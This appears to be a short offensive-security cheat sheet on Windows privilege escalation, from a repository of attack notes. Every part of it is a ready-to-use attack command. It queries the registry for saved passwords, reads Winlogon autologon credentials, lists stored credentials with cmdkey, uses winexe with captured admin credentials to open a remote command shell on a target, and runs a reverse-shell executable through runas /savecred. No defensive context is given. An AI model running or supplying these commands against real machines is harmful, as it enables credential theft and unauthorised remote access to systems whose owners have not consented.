killchain-compendium/Exploits/Windows/Password in Registry.md

458 B

Password Inside Registry Key

  • Query passwords saved inside the registry
reg query HKLM /f password /t REG_SZ /s
  • Admin Autologon credentials
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
  • On attacker, change the credentials on target
winexe -U 'admin%password' //<target-IP> cmd.exe

List other Creds

cmdkey /list
  • Open reverse shell
runas /savecred /user:admin C:\shell.exe